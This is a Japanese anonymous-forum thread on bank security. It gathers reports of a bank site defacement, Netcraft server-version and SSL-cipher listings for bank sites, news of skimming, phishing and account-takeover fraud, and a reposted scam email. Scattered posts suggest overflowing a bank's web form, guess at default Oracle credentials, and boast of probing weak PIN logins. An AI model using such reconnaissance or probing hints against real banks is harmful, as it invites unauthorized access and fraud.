ま、頑張ってくれ。缶コーヒーでも飲みながら落ち着くといいよ

あぼーん

age

WINが動かなくなり初期化しようとしたのですがリカバリーディスクが一枚なくなりましたどうすればいいのですか？

>>761
http://pc.2ch.net/test/read.cgi/sec/1035736614/712

>>761
お前も動かなければいい。
だから死ね

age

あぼーん

age

(ﾟДﾟ)

(ﾟДﾟ)

北日本銀行が改竄されていたらしい
http://www.fearoot.com/
■ 2003/03/29(土)
株式会社北日本銀行
URL : http://www.kitagin.co.jp (Defaced by IR4DEX)
OS : Linux
Server : Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25

北日本銀行
URL : http://www.kitagin.jp (Defaced by IR4DEX)
OS : Linux
Server : Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25

age

>769
担当ラインが事務過誤等により責任を取らされるんでしょうね。（藁）

夫婦共々ダイエットに励むこととなりました。
目標は今年の夏、大体体重で言えば10kgの減量ということになります。
さて、後３，４ヶ月で達成できるんでしょうか？

Operating System and Web Server for www.kitagin.co.jp

The site www.kitagin.co.jp is running Apache/1.3.20 Sun Cobalt (Unix)
mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6 mod_auth_pam_external/0.1
FrontPage/4.0.4.3 mod_perl/1.25 on Linux.

OS, Web Server and Hosting History for www.kitagin.co.jp
OS Server Last changed IP address Netblock Owner

Linux Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b
PHP/4.0.6 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25
30-Jul-2002 203.182.48.208 R-NAC Internet Service

Linux Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b
PHP/4.0.3pl1 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25
15-Feb-2002 203.182.48.208 R-NAC Internet Service

Linux Apache/1.3.12 Cobalt (Unix) mod_ssl/2.6.4 OpenSSL/0.9.5a
PHP/4.0.3pl1 mod_auth_pam/1.0a FrontPage/4.0.4.3 mod_perl/1.24
3-Jul-2001 203.182.48.208 R-NAC Internet Service

FreeBSD Apache/1.3.12 (Unix)
8-Dec-2000 210.255.227.2 NNET CORPORATION

今日の日付で変更されてるからもう直ってるね。
ネットセキュリティにはまだ載っていない。
https://www.netsecurity.ne.jp/

株式会社北日本銀行 がクラックされています
北日本銀行のサイトがブラジルのクラッカー Ir4dex に侵入されたようです。
ttp://asia.geocities.com/elpoepiebyreve/2003/2003-3.html

どこも発表しないね。

>>775
どこがクラックされてるの？http://www.kitagin.co.jp/

暖かな日射しと南風のもと、桜の蕾も徐々に綻び始めた昨今。
皆様いかがお過ごしでしょうか。
私は、・・・斃れてました（笑

>>776
もう直ってる。>>769のリンク先で報告されてた。

>>777
777ゲトおめ。長い間保守サンクス。

うえっ…

　春　厨　も　た　け　な　わ　の　季　節　

　春　厨　も　た　け　な　わ　の　季　節　

sage進行よろしく

北日本銀行が富士通の勘定系パッケージ導入を白紙撤回
http://itpro.nikkeibp.co.jp/free/NC/NEWS/20030402/4/

マルチポストやめろ、アホ！

ひたすら無視して削除依頼。これが一番。





あぼーん

あぼーん

あぼーん

あぼーん

あぼーん

age

あぼーん

あぼーん

あぼーん

　

>>785

http://www.agemasukudasai.com/movie/

（＾＾）

　

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

最近カキコないね。かちゅでログ詰まりしてるのかな皆

>>705 の事件なんですが、人づてにあの事件でシティ以外にオンライン専業銀行
の口座が被害にあったと聞きました。で、この事件でシティは取引に色々と制限が
かかったみたいなんですが、もう一つのオンライン専業銀行は特別措置をしていない
らしいです。それどころか、報道機関からの問い合わせに対して、「そのような事実
はない」と否定しているらしく、銀行名が報道されていないとのことです。

被害額は300万円ほどだったそうです。

オンライン専業銀行って３つしかないですよね・・・。

どこの銀行なのかソースキボン

３つしかって、どことどことどこだっけ

http://news.goo.ne.jp/news/asahi/shakai/20030312/K0011201911056.html

ジャパンネット銀行、イーバンク、ソニー銀行のどれかだろうね。

ワットNEWSってなに？

どこなのかわかるまでは怖くて使えませんです。

なるほどこういう手口もあるのか。

http://news.goo.ne.jp/news/asahi/shakai/20030312/K0011201911056.html
ネット専業銀行の顧客になりすまし、同行のコンピューターサーバーに侵入。
顧客の住所を自分が契約している民間の私書箱の住所に変更した。その上で、
同行の顧客サービス窓口に電話し、「キャッシュカードを紛失した」とうそを
言って、カードを再発行させたという。

ネットで住所変更してカードを再発行、カードを受け取ったあとに
住所をもとのに戻しておけばすぐにはばれないね。

> 同行のコンピューターサーバーに侵入。

「侵入」という表現は間違いだよな。
正規の利用者も侵入して使っているわけじゃない。
朝ピーってほんと馬鹿だな。

＞「侵入」という表現は間違いだよな。
正規の利用者じゃなければ「侵入」と言われてもおかしくは無い罠

http://www.yamazaki.90.kg/hankaku/hankaku07.html
http://yamazaki.90.kg/zenkaku/index.html
http://www.yamazaki.90.kg/hankaku/hankaku08.html
http://yamazaki.90.kg/hankaku/hankaku10.html
http://www.yamazaki.90.kg/hankaku/hankaku01.html
http://yamazaki.90.kg/hankaku/hankaku03.html
http://www.yamazaki.90.kg/hankaku/hankaku02.html
http://yamazaki.90.kg/hankaku/hankaku09.html
http://www.yamazaki.90.kg/hankaku/hankaku06.html
http://yamazaki.90.kg/hankaku/hankaku04.html
http://www.yamazaki.90.kg/zenkaku/index.html
http://www.yamazaki.90.kg/hankaku/hankaku05.htm

>>812
侵入というと、カウンターを乗り越えて事務所の奥に押し入ったという感じ。
成りすましアクセスは、カウンターで正規の利用者と同じように利用したわけで。

障害でネット取引一時停止　ジャパンネット銀行
http://www.sankei.co.jp/news/030428/0428kei130.htm

　

>>815
セキュリティ以前のフォールトトレランスの問題だよなあ。みずほとか

不治痛ですか？
http://uptime.netcraft.com/up/graph?site=www.japannetbank.co.jp
running Netscape-Enterprise/3.6 SP3 on BSD/OS
OS Server Last changed IP address Netblock Owner
BSD/OS Netscape-Enterprise/3.6 SP3 5-May-2003 202.219.39.15 InfoWeb(Fujitsu Ltd.)

http://www.netcraft.com/sslwhats?host=www.japannetbank.co.jp
HTTPS Server
Netscape-Enterprise/3.6 SP3
Supported SSL ciphers:
RC4 with MD5
RC4 with MD5 (export version restricted to 40-bit key)
RC2 with MD5
RC2 with MD5 (export version restricted to 40-bit key)
DES with MD5
Triple DES with MD5
Serial number: 0x2d5a497b38bc69fbffcf425d2fd9885b

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

　

◆お○ん○が見れる◆
http://bbs.1oku.com/bbs/bbs.phtml?id=yasuko

http://homepage.mac.com/hiroyuki43/moe/jaz04.html

は？

イーバンクはキャッシュカード無いよな…

新種のコンピューターウイルス　金融機関を標的
http://www.sankei.co.jp/news/030607/0607kei058.htm

　

UFJのローン申し込み画面で大量の文字列をテキストボックスに
ぶち込んでみたら？？
確か変な動作すると思うんだけど・・・

>>827
ﾀｲｰﾎ

富士痛が出しているセーフ何とかって言うやつ、
Oracleのバックアップやるやつだっけ？こないだもトラぶって話題になったやつだよ。
あれたしか、Oracleのパスワードはデフォルトのやつしかサポートしませんみたいなことが
かかれているのを見たことがあるのだが････。
ある銀行のシステムも、system/manager なんだろうなぁ・・・。

先日One's plus(つまりOne's direct)に申し込んだばかりだが、
このスレ見たら不安になった。
パスワードはこまめに変更したほうがいいですよね？

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

使わないのが一番。

相互リンクｱｹﾞ
http://money.2ch.net/test/read.cgi/money/1047051136/
各銀行のインターネットバンキングって大丈夫？

　

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

参院合同銀行ちょっと前までジャジャ漏れざんした。ＰＰ

Return-Path:
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from AIFULNET02.aiful.jp (unknown [210.169.240.18])
by BocksCar.ORDB.org (Postfix) with SMTP id 8895C54B9
for ; Sun, 31 Aug 2003 23:17:09 +0000 (GMT)
Received: from gwall.aiful.jp ([192.168.129.12])
by AIFULNET02.aiful.jp (NAVGW 2.5.1.19) with SMTP id M2003090108184103426
for ; Mon, 01 Sep 2003 08:18:41 +0900
Received: (from root@localhost)
by gwall.aiful.jp (8.11.6+Sun/8.11.6) id h7VNEWQ08297
for ; Mon, 1 Sep 2003 08:14:32 +0900 (JST)

Return-Path:
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from takagi-sec.co.jp (b07-c3.data-hotel.net [203.174.71.186])
by BocksCar.ORDB.org (Postfix) with SMTP id 6A6E955C7
for ; Sun, 31 Aug 2003 23:09:48 +0000 (GMT)
Received: (qmail 10028 invoked by uid 0); 1 Sep 2003 08:09:44 +0900
Received: from unknown (HELO sv001052.takagi-sec.co.jp) (192.168.1.52)
by O with SMTP; 1 Sep 2003 08:09:44 +0900
Received: from takagi-sec.co.jp ([192.168.2.2])

Return-Path:
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from mail.sumitomotrust.co.jp (mail01.sumitomotrust.co.jp [211.1.71.194])
by groundzero.ordb.org (Postfix) with ESMTP id 9C2D22AA25
for ; Sun, 31 Aug 2003 23:29:30 +0000 (GMT)
Received: from localhost.localdomain (localhost.localdomain)
by mail.sumitomotrust.co.jp (2.6 Build 1 (Berkeley 8.8.6p2)/8.8.4) with ESMTP
id IAA32416 for ; Mon, 01 Sep 2003 08:29:25 +0900

ttp://itpro.nikkeibp.co.jp/members/NIT/JIREI/20030828/1/

それで、メールサーバがORDBに入ってたというわけか？(w
（昨日、やっと修正された）

おかげで、メールフィルタリング設定に影響受けたんだがSLA適用外だろうな

>840

直ってたよ。晒されたから慌てたようだな

>842

どこ見てる（プッ）　直ってないぞ。

>>837
詳細喜盆ぬ

ミ・д・ミ

ミ・д・ミ

ミ・д・ミ

ミ・д・ミ

情報期待あげ

test

最近は安定ぎみ？

そうでもないよ

また、Internet Watchの古川泰弘氏の記事に対する公式コメントがBacksection
オフィシャルサイトに掲載されています。
古川氏のサイト発見(http://www.bekkoame.ne.jp/~x2600/)。背景黒ですよ。
アングラサイト認定（笑

今日は暇だったので、インターネット株取引をやっている証券会社のウェブサイトをハッキングし
てみる。恐ろしいことに、暗証番号が4文字のところが多い。

だって、おいおい。

古川　泰弘（ふるかわ　やすひろ）

ＫＰＭＧビジネスアシュアランス（株）アナリスト。1965年東京生まれ。ソフトウエア会社、セキュリティ会社を経て、2001年から現職。
毎日新聞社特約支社（バーチャル特派員）、日本経済新聞社コラムニスト、インプレス外部ライターとして寄稿する一方、
PC　Japan（ソフトバンクパブリッシング）、N+I　Network　Guide（同）、日経NETWORK（日経BP）、Cyber　Security　Management（Japan　Cyber　Security　Institute）にインターネット事件、セキュリティ関連記事などを執筆している。

主な著書に、「初めて使うMule　for　Windows操作ガイド」（共著、カットシステム）「インターネット教科書」（共著、I&E神蔵研究所）「アクトンファイル2000」（共著、サイビズ）「GIMPエッセンシャルテクニック」（共著、オーム社）などがある。

個人メールアドレス：[email protected]

おい！みんな！今からうんこTIMEだ！
トイレに行け！

>>853
不正アクセスまっしぐらか。

トマト銀行の顧客リスト盗まれる　１６５１人分
http://www.sankei.co.jp/news/040309/sha119.htm

どこもかしこも考え方が古い・外部からの攻撃の防御に必死になってるｗｗ
外部からもそう必死にはなってないかな

今までは話題にならなかっただけだろ。

857の精神面の問題ですか？

防犯・防詐欺(仮)＠2ch掲示板
http://that2.2ch.net/bouhan/

個人情報流出？　ネット銀行から不正な振り込み

　他人のパスワードを使ってインターネット銀行に不正にアクセスし、自分の
口座に入金させたとして、兵庫県警捜査二課などは２２日までに、不正アク
セス禁止法違反などの疑いで、兵庫県三田市、内装業、大久保浩司（４１）、
神戸市、会社員、宮崎均（４７）ら４容疑者を逮捕した。

　捜査二課などは、被害者の個人情報が流出した可能性が高いとみて入手
の経緯について４人を追及。ほかにも多数の余罪や複数の関与した人物が
いるとみている。

　調べでは、４人は昨年９月下旬、神戸市西区のインターネットカフェで、同市
中央区のゲームソフト販売会社経営の男性（１９）の口座番号やパスワード
などを使ってネット銀行にアクセスし、４人が管理する架空名義の銀行口座
へ３６万円を入金させた疑い。

　その後も数回にわたり計３００万円が同様の手口で引き出されていることが
確認されている。昨年１０月、男性が「身に覚えのない出金がある」と県警に
相談した。

　宮崎容疑者は「関与していない」と否認。大久保容疑者は当初否認したが、
その後、ほかの２人とともに大筋で容疑を認めているという。

(06/22 21:48)
http://www.sankei.co.jp/news/040622/sha138.htm

さっきやっていたテレビ番組で、ATMの回線に盗聴器仕掛けて、
キャッシュカードの情報と暗証番号を盗むのは簡単にできて
被害が多発しているというのだが、暗証番号って平文もしくは
それに近い形で流れているの？
マジ、キャッシュカード使うの怖くなってきた。

》862

＞被害が多発しているというのだが､暗証番号って平文もしくはそれに近い形で流れているの?
＞ﾏｼﾞ､ｷｬｯｼｭｶｰﾄﾞ使うの怖くなってきた｡
今じゃCRAM-MD5で暗号化しないと、まずいんちゃうか？

昔のキャッシュカードはカード自体に暗証番号が入っていたらしいからね
郵貯とかの古いカード使ってる人は注意

＞昔のキャッシュカードはカード自体に暗証番号が入っていたらしいからね
何年前の話をしてるんだ…ｗ

お前らは可変暗証番号とか全銀プロトコルを知らないのか？
ほかにも全二重モデムとか。
実はキャッシュカードは銀行のシステムによってはロックされないで
力業ができる方法がある。
書くとホントにやる奴が出て俺も警察に呼ばれそうだから教えない。

>>866
じゃあ、これだけは教えて。
絶対大丈夫な銀行はどこ？

>>867
そりゃ日銀だろ

口座を作るときにキャッシュカードを作らず通帳もオンライン（ＡＴＭ）で使えないようにしてもらう
すると銀行印だけが唯一の頼りになるので、これを常に肌身離さず持っておく

キャッシュカードを作っている口座には、決済の為に当座必要な最低限の金額しか置かない

引き落とした日付は、通帳とは別にメモしておいて照合する

自分がそれで満足ならそれでいいじゃん

日銀は端末が専用で金融機関にしかないから那。
でも、専用線だけではない。

これやばくね？４桁・・・・
ttp://www.smbc-card.com/mem/vps/login/index.jsp

>>872
＞会員番号・暗証番号でログイン
カード番号＋4桁？の暗証番号ならよろしくないですね。

http://www.japannetbank.co.jp/lite/index.html
当サイトでは、 128ビットSSL暗号化通信により、
お客さまの情報を保護しております。

ATM入口にスキミング用のカードリーダーを置いて
入ってくる客にカードを読ませていた事件があったね。

>>869
これって通帳やカードを貸金庫で保管する場合は
ネットバンキングさえしなければあとは大丈夫って事でしょうか？

>>875
マジで？でもその部分が思いっきり出っ張ってバレバレになるんじゃないの？

>>876
カードを作っている場合はカードを偽造して引き出しされる可能性があるから大丈夫じゃないよ。
ちなみに自分のカードをハサミで切っても意味無いよ。

>>877
> >>875
> マジで？でもその部分が思いっきり出っ張ってバレバレになるんじゃないの？

まぁ、だいぶ前のことになるけど、即席夜間金庫を作ってお金を盗もうとした事件があったくらい、一般の
人の意識はいい加減だからなぁ。

>>877
ではネットバンクで定期する時に身を守る方法はありますか？

>>869
無理だな。
最近は印鑑もコンピュターで作るから印鑑の複製も簡単に出来る。
だから最近は通帳の裏に印鑑を押さなくなってきてる。

一番安全なのは窓口のテラーに顔を覚えて貰う事だな。

>>879
ネットバンクの定期って即日で解約出来るのか？
そうじゃなければ毎日口座をチェックすれば回避出来るんじゃない？

まぁ銀行なんて当てにならないよ。参考リンク
http://d.hatena.ne.jp/magisystem/20040816

2004年09月06日
イーバンク銀行、世界的に急増する「フィッシング詐欺」への対策を拡充
〜ログイン時にキーワードによるサイト確認が可能に〜
http://www.ebank.co.jp/information/press/2004_09_06.html


さすが我らのイーパンク銀行でつ

>>882
別ウィンドウを開くのにjavaスクリプトを使うなボケェ！

>>882
ちうか、
なんでキーワードごときでサイト確認になるんかわからんのだが？

>>875の記事

カード情報盗み預金窃取か　ＡＴＭ脇に読み取り装置

　愛知県半田市のスーパー駐車場内にある銀行のＡＴＭ（現金自動預払機）
コーナーで、何者かが置いた磁気情報読み取り装置にキャッシュカードを通
した利用者が、預金を引き出される被害に遭っていたことが６日、分かった。
半田署は窃盗などの疑いで捜査している。

　調べでは、半田市内の３０代の主婦が８月上旬、このＡＴＭ脇に「防犯上、
ご利用のお客さまはカードをお通し下さい」と張り紙のある小さな箱状の磁気
情報読み取り装置にカードを通した。同月下旬になって、別のＡＴＭから預金
計約１０００万円が引き出されていることが判明したが、張り紙や読み取り装
置はすでに撤去されていた。

　古いタイプのキャッシュカードは、こうした装置で暗証番号も読み取られる
恐れがあるといい、同署は何者かがカードを偽造したとみて、防犯ビデオを
分析するなどして調べている。

(09/06 12:40)
http://www.sankei.co.jp/news/040906/sha056.htm

>>885
>古いタイプのキャッシュカードは、こうした装置で暗証番号も
>読み取られる恐れがあるといい

平成元年に当時の大蔵省からカードに暗証番号をいれるな
と言われてるからキャッシュカードに関してはこれは無い。

セキュリティーというか管理が甘いのは外銀と中小金融機関
だな。

>>886
240 名無しさん＠５周年 04/09/07 05:13 ID:iANZeCPR
>>239
甘い。俺が知ってるだけでも、２０の銀行で暗礁番号が書かれたカードを野放しにしてる。
なんで回収しないのか？バカなんだろうな。
http://news19.2ch.net/test/read.cgi/newsplus/1094443074/240

>>887
古いカードを回収してないだけだろ。
20以上の銀行で口座作って確認する奴なんか存在するのか？

＞古いカードを回収してないだけだろ。
暗証番号が書かれたカードをATMなりCDに入れると
暗証番号の磁気部分を００００で上書きするという話を聞いた事があるのだが、
これが真だとすれば古いカードを回収する必要は無い。

>>889
ゼロ暗証化機能があるＡＴＭは多数存在する。全てかどうかはしらん。

今でも残ってるのは年寄りがタンスの中にしまってるカードくらい。

って事は
事実上「暗証番号が記録されているカード」は使われる心配が無いって事か。

>>889
全部の金融機関が導入できるわけがないでしょ。
ATMの値段は1000万位なんだよ。
改修で済ますにしてもシステムは新たに書き直す部分が
出てくるし店頭でやった方が安い場合もある。

＞全部の金融機関が導入できるわけがないでしょ。
どこに「全部の金融機関が導入している」って書いてあるんだろう。

早とちりの893はどこに行った？

ニセＨＰにアクセスさせ暗証番号狙う…新手ネット詐欺

　米大手銀行「シティバンク」を装って同行の顧客に電子メールを送りつけたうえで、同行の偽のホームページにアクセスさせて暗証番号などの個人情報を聞き出そうとする、新手のネット詐欺が確認された。

　実在する会社をかたったメールを送り、返信メールに個人情報を書き込ませる「フィッシング詐欺」の“進化形”とも言え、偽のホームページを組み合わせた手口が確認されたのは国内で初めて。警察庁も「同様のネット詐欺が増える危険がある」と注意を呼びかけている。

　同行などによると、問題のメールが顧客に送りつけられるようになったのは今年夏ごろ。シティバンクが発信したように見せかけた英文のメールで、「シティバンクの顧客の個人情報が盗まれる事例が相次いでいる。
すぐにあなたの情報を確認しなければならない」と記載。「時間内に確認できない場合は、口座を凍結する」としたうえで、指定されたホームページ・アドレスにアクセスするよう指示している。

　アクセスすると、シティバンクの本物のホームページとともに、シティバンクを装った偽のホームページが表示され、偽のホームページに顧客の口座番号や暗証番号などを入力するよう求められる。

　詐欺にひっかかり、口座番号や暗証番号などを入力してしまうと、口座から勝手に預金が引き出されてしまう危険があるが、同行によると、今のところ被害は確認されていないという。

　犯人側が、顧客名簿などに基づいてメールの送信先を選んでいたかどうかは不明。同行では、英語と日本語の各ホームページや、顧客向けのニュースレターで注意喚起している。

　詐欺メールを受け取った都内の男性会社員（４２）は、「本物と偽物のホームページが同時に表示されるので、危うく暗証番号などを入力してしまうところだった。念のため銀行側に問い合わせたから、被害に遭わずに済んだ」と話している。

http://www.yomiuri.co.jp/national/news/20040917i406.htm

　国内では今年に入って、クレジットカード会社「ＪＣＢ」、検索サイト運営会社「ヤフー・ジャパン」などを装って、「ギフトカードが当たった」「あなたのＩＤが何者かに解読された」と偽り、個人情報をメールで返信させようとするフィッシング詐欺が相次いでいる。

　また、金融機関を巡っては今年１月、「みずほ銀行」をかたって、コンピューターウイルスが仕込まれたホームページにアクセスさせようとする迷惑メールが出回った。個人情報を聞き出す手口ではなかったが、同行では「フィッシング詐欺は世界中で増えており、
今月から事前防止策として弊社のホームページでも注意を呼びかけている」と話している。

(2004/9/17/14:39　読売新聞　無断転載禁止)
http://www.yomiuri.co.jp/national/news/20040917i406.htm

＞同行などによると、問題のメールが顧客に送りつけられるようになったのは今年夏ごろ。

去年夏ごろからだろ?
なにをいまごろ。

＞これが真だとすれば古いカードを回収する必要は無い。
と言う事は全部だな。
恥ずかしい早とちりの894と985はどこに行った？

[email protected]

あげ

おまえら、詳しいんだろ？
本当にこんな事出来るのか？
心配で、夜も寝られねぇ

http://money3.2ch.net/test/read.cgi/money/1069924792/210-

>>902
松村のいい加減な憶測だと思われ

本当にアクセスコードって2つ入ってる？
もしそうだとしたら、一方の書き換えで出来ると思う。

保守。

名スレ保全sage

　

7月11日UFJダイレクトがリニューアル！
ttp://www.ufjbank.co.jp/topics/direct_renewal.html
　　↓

ただいまインターネットバンキングはお取引きが込み合っているため、つながりにくくなっております。お急ぎのお客さまはモバイルバンキング、テレフォンバンキング、窓口およびＡＴＭをご利用ください（ただし電話はつながりにくい場合がございます）。
ttp://www.ufjbank.co.jp/ib/index.html

保守。

イーバンク銀行
SSL 3.0、Triple DES / 168 ビット暗号 (高); RSA / 1024 ビット交換

みずほ銀行
SSL 3.0、RC4 / 128 ビット暗号 (高); RSA / 1024 ビット交換

東京三菱UFJ銀行　2006.01.30
SSL 3.0、RC4 / 128 ビット暗号 (高); RSA / 1024 ビット交換

どうでもいいがセキュ板って古いスレ残ってるな〜

age

東京・銀座の銀行の夜間金庫前に偽の自作金庫置き現金を盗もうとした無職男逮捕
http://www.fnn-news.com/headlines/CONN00093690.html

問うわ

　　∧∧
　　(,,ﾟДﾟ)　
　 ⊂　　つ
　 〜　　|
　　 し｀Ｊ

【UCﾌﾞﾗﾝﾄﾞは】UCっていいですよね。22【不滅です】
http://life8.2ch.net/test/read.cgi/credit/1164383133/

銀行ではないけど

http://news23.2ch.net/test/read.cgi/news/1191144510/628
http://news23.2ch.net/test/read.cgi/news/1191144510/664
http://news23.2ch.net/test/read.cgi/news/1191144510/745

イーバンクが一番セキュリティが弱そう。

お前の頭が弱そう

これは詐欺？一日に何通も来るけど....
　　　　　　　　　　【番組料金未納通知】
　　　　　　　　　　完熟アダルト事務局
　　　　　　　　会員ID番号　KAD*******様へ
お客様は2007-**-** **:**:**にご入会頂けました当サイト、完熟アダルトのご入会時に発生しております番組料金98550円を滞納なさっております。
早急に番組料金98550円のお支払いをお願い申し上げます。
<中略>
これは、利用規約違反に該当致します。

<中略>
【お客様サポート窓口】
フリーダイヤル　　0120-964-570
メール問合わせ　　[email protected]
【銀行名】横浜銀行
【支店名】渋谷支店
【口座種別】普通口座
【口座番号】1404748　
【口座名義】カ）ナガイキカク
【振込金額】98,550円

この銀行は詐欺の片棒担ぎか？

銀行か適当な通報先に通報すればおｋ
間違えても個人情報流すなよ？

さげ

糖尿病

おもちゃ銀行

強盗っす

あざーす

あーす

たまにはage

sage

日本銀行

なんとか支店

日本にある銀行全部

T銀行

某B銀行

サイトのデザインがダサいところ

行員が外回りに使う軽自動車のタイヤがツルツルな**銀行

オレオレ認証

C金融

赤福